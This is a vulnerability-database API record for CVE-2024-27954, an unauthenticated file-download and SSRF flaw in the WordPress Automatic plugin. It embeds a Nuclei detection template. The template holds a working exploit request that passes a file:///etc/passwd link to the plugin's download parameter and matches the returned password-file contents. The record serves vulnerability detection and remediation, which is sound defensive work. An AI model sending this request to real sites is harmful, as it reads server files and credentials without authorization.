{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2024-27954/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2024-27954/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2024-27954/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2024-27954/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2024-27954/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2024-27954"},"sightings":{"href":"/api/v1/sightings/cve-2024-27954"}},"enrichments":{"cisa-kev":{"kev":false},"epss":{"epss":0.72766,"kev":false,"percentile":0.99424},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2024/CVE-2024-27954.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2024-27954\n\ninfo:\n  name: WordPress Automatic Plugin <3.92.1 - Arbitrary File Download and SSRF\n  author: iamnoooob,rootxharsh,pdresearch\n  severity: critical\n  description: |\n    WordPress Automatic plugin <3.92.1 is vulnerable to unauthenticated Arbitrary File Download and SSRF Located in the downloader.php file, could permit attackers to download any file from a site. Sensitive data, including login credentials and backup files, could fall into the wrong hands. This vulnerability has been patched in version 3.92.1.\n  impact: |\n    Unauthenticated attackers can download arbitrary files from the server including sensitive credentials and backup files, and perform SSRF attacks.\n  remediation: |\n    Update WordPress Automatic plugin to version 3.92.1 or later.\n  reference:\n    - https://wpscan.com/vulnerability/53b97401-1352-477b-a69a-680b01ef7266/\n    - https://securityonline.info/40000-sites-exposed-wordpress-plugin-update-critical-cve-2024-27956-cve-2024-27954/#google_vignette\n    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27954\n  classification:\n    cvss-score: 9.8\n    cve-id: CVE-2024-27954\n    cwe-id: CWE-918\n    epss-score: 0.72766\n    epss-percentile: 0.99424\n  metadata:\n    verified: true\n    max-request: 1\n    publicwww-query: \"/wp-content/plugins/wp-automatic\"\n  tags: wpscan,cve,cve2024,wp,wordpress,wp-plugin,lfi,ssrf,wp-automatic,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/?p=3232&wp_automatic=download&link=file:///etc/passwd\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"link\":\"file:'\n\n      - type: regex\n        regex:\n          - \"root:.*:0:0:\"\n# digest: 480a00453043022037fc48d9ef731084bbaadc0b75b27b9eebdee63850c5d972d9a45a12f30bbeaa021f268e57ab6c586d5f89497e52a23ca219fbe73cb56263fa7ff0bcb12c91e160:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2024-27954"}